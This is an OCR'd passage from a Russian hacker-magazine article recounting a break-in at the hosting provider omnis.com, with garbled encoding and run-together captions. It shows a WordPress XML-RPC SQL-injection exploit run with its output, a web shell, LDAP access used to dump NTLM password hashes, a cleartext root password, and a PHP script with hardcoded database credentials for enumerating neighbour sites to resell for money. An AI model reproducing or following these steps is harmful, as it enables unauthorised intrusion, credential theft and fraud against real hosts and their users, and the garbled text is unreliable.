книги хакеры / журнал хакер / 133_Optimized

ВЗЛОМ

ÂÑÅß ÑÅÒÈ OMNIS — САМЫЙ ЛУЧШИЙ ХОСТИНГ!

ПРОВАЙДЕР ÂÑÅß ÑÅÒÈ Если ты предста-

вил, что виртуальные купюры WMZ уже шелестят у тебя в кошельке, и глазки заблестели, то пойдем дальше и представим типичную картинку — хостинг-провайдера www.omnis.com, у которого, как соты в пчелином улье, хостится множество вкусных сайтов с хорошим PR (за которые отдают неплохие деньги). Один такой попался мне совсем недавно, а остановился я на нем совсем случайно — очень уж повеселило его название — Omnis Network (что в вольном переводе означает «Провайдер Всея Сети»). Особенность данного божественного пасквиля в том, что ребята из Omnis помешаны на послеполуденных молитвах и безопасности. Многие очень умные люди обломали свои зубки о всевозможные хитрости, придуманные этим хостером.

ПОМОЛИМСЯ, ÄÅÒÈ ÌÎÈ! А заодно поду-

маем головой — хостят они кого попало, одних только простых сайтов больше 5000. Наверняка, найдутся пингвины, которые не

в ладах со своими движками и CMS. Если все так, то и искать можно, начиная с самых простых вариантов (потому как настоящий хактивист всегда идет в обход). Выбираем несколько вариантов из наиболее доступ-

ных — WordPress, Joomla, DataLifeEngine, CowPHP и пр. Теперь пробуем... Нас интересуют не просто сайты, а сайты-соседи, которые мало того, что хостятся физически на одном сервере, так еще и принадлежат нашему священному чуду omnis.com. Чтобы найти сайты-соседи, можно воспользоваться отличным сервисом robtex.com.

Это настоящий швейцарский ножик для компьютерных сетей. Он мало того, что рисует картинки зависимостей DNS, так еще и накапливает эту информацию после собственных поисковых исследований! У него можно спросить как IP-адрес, так и наоборот, доменное имя, соседа которому хочется найти.

В ходе нескольких проб был установлен первый кандидат на исследовательский «пробив». О чудо! Целью оказался WordPress

древней версии 2.2.1 с уязвимостью XMLRPC (burnmanbedlam.com).

Этого динозавра, конечно, можно валить с помощью автоматических средств — например, готового POC-примера от группы notsosecure.com. Как работает релиз команды (нашей тезки), смотри ниже:

#beambox@faruk# ./wp-xmlrpc-2-2- sql.pl http://burnmanbedlam.com/ complita truckmebaby 31

The usage is correct [*] Trying Host http:// burnmanbedlam.com/ ...

[+] The xmlrpc-2-2 server seems to be working

--------------------

Username for id = 1 is:--> admin Md5 hash for user: admin

is: 1f3c53937f213d5b247d2d032d0d 2030

--------------------

ПРАВИМФАЙЛЫPHP ВАДМИНКЕ ВЗЛОМАННОГОСАЙТАДЛЯПОЛУЧЕНИЯШЕЛЛА(РАБОТАЕМПОД

WORDPRESS)

Username for id = 2 is:--> burnman

Md5 hash for user: burnman

is: ffd03373047a3390328e3d63520f 9db6

--------------------

Username for id = 3 is:--> complita

Md5 hash for user: complita

is: 1eb307423c98331ce3623989328d 2c0a

-----------------------

Total Number of Users found:-->3

-----------------------

Mysql is running as: burnm001@ mysql.omnis.com

В качестве параметров сплоиту надо передать имя зарегистрированного пользователя

(complita), пароль к нему (truckmebaby) и

номер существующего поста, в который этот замечательный пользователь может записывать любую информацию. Выбранный burnmanbedlam.com нас не подвел — и реги-

страция открыта, и посты наполнять можно (их даже видно, что вдвойне приятно, хоть и редкость в наше время). На самом деле, вместо того, чтобы тратить драгоценное время на поиск и анализ уязвимого узла, всегда существует вариант приобретения чистого хостинга у провайдера — все дальнейшее совершенно одинаково как для легального пользователя, так и для неравнодушного исследователя :).

Тем более, в большинстве случаев хостингпровайдер предоставляет свои услуги всего на одном-двух очень мощных серверах. Так что шанс «промахнуться» и приобрести в аренду ненужный тебе хостинг очень мал.

СУИДНАЯ КАПЕЛЛА Первое, что порадовало, когда был залит шелл — это отсутствие включенного SAFE_MODE и пустой список недопустимых функций. Казалось бы, запускай что угодно, делай что угодно — все разрешено. Как бы ни так — вместо привычного ответа «nobody» или «www» на вопрос «whoami» был получен вполне вразумительный «burnm001», то есть, имя конкретного владельца данного сайта (на который и был установлен шелл). Кроме того, права на файлы установлены так, что содержимое

соседних сайтов недоступно вовсе. Для этого веб-сервер сконфигурирован таким образом, что во время запуска пользовательских про-

ОПЛАТАКРЕДИТКАМИУПРОВАЙДЕРАOMNIS.COM (СТАТИСТИКАЗА СУТКИПООДНОМУХОСТИНГ-ПЛАНУ)

ВЗЛОМ

СВОДНАЯТАБЛИЦА«ЧЕРНОЙ» БУХГАЛТЕРИИСВЯТОГОOMNISПРОВАЙДЕРА— ЗАОДИНМЕСЯЦ

МАЛЫШКАНАМИЛЛИОНДОЛЛАРОВ— РЕБЯТАЗАМЕСЯЦ«ПЕРЕРАБАТЫВАЮТ» БОЛЬШЕ1.5 МИЛЛИОНОВЗЕЛЕНЫХДЕНЕГ

ПОЛЬЗОВАТЕЛИИЗНУТРИLDAP

может хранить несколько значений. О тонкостях настройки и работы LDAP мы писали в статье «Контроллер домена на SAMBA за семь шагов» (в 6 номере z за 2008 год). Остается лишь вопрос, как получить доступ к серверу LDAP, который по совместительству исполняет роль контроллера домена? Извне нас поджидает межсетевой экран, начиненный запрещающими правилами, как казанский плов рисом. Но вот внутри бокса консольных приложений для работы с LDAP попросту нет, так что свежеустановленный шелл нам не поможет. Остается только одно — установить в систему все, что нужно, самим. Ничего не скажешь, наглость города берет, да и программка быстро нашлась подходящая — phpLDAPadmin (скачать можно по адресу phplda- padmin.sourceforge.net). Средство phpLDAPadmin написано целиком на PHP, работает без необходимости установки какихлибо библиотек и патчей, что идеально подходит для установки на добытом шелле. Устанавливаем с помощью шелла phpLDAPadmin на ранее исследованный вдоль и поперек нами хост. Вписываем адрес контроллера и строку подключения с паролем в конфигурационный файл, запускаем, наслаждаемся доступом, который позволяет нам подсчитать количество настоящих пользователей (их

всистеме 27), а также посмотреть их пароли

вформате NTLM! Дельный совет — чтобы получить доступ ко всей информации, необходимо, во-первых, воспользоваться усечением строки доступа до корневого домена (то есть, чтобы строка выгля-

дела как «dc=omnis,dc=com» вместо «cn=root,ou=Special Users,dc= omnis,dc=com»), а во-вторых, использовать не простой поиск, а экспорт данных из LDAP

вфайл просто формата — например, CSV.

brad:1000:986BB475FD95731486235A2

333E4D2:68227ACC65C876AD0D1A627C3

2A06BD7

fromm:1001:0BAD9021C73A4417306D27

2A9441BB:2DAD344B45B352CBD399D345

E8B9B308

gchon:1003:BE11A10D73AA31AAD3B435

B51404EE:4AB4FEF0EDA7B2D5A7A57503

B0C16B65

joel:1004:505CC6DF3797A3352502E32 A407F23:1AE71A4A01F80B00CC1F06D60A 53AA7F root:1005:FF1D3ABC1797B8CDE68AA26

ПРОВАЙДЕРУБОЛЬШЕ10 ЛЕТ, ИУНЕГООЧЕНЬМНОГОНАГРАД...

ПОДРОСЛИ, НОНЕПОВЗРОСЛЕЛИ

root:b&xId(cO

Пробуем вводить полученные пароли прямо в логин-шелле, однако получаем отказ — шелл у нас индейский (от Апача), для этих целей не приспособленный. Придется искать обходной путь. Правда, попутное промежуточное решение тоже ничего — один из паролей подошел к mysql-базе данных, которая оказалась рядом (по адресу mysql.omnis. com). Полученный к СУБД доступ был рутовым — это сильно порадовало, так как среди хостеров OMNIS.COM немало товарищей с PageRank 6 и 7, а они (как мы помним) стоят денег. С помощью простого скрипта, загруженного через шелл, подбираем доменное имя сайта (чтобы оценить затем PageRank) по имени базы данных и ее типу:

<?php $mysql_username="joel"; $mysql_password="tchenolaw";

$mysql_host="mysql.omnis.com";

$fh = fopen("bases.txt", "r"); while (!feof($fh))

{

$line = fgets($fh, 4096); chop($line);

echo "database: ", $line, "\n"; $mc = mysql_connect($mysql_

host, $mysql_username, $mysql_ password) or die("cannot connect to db!");

mysql_query("use $line;")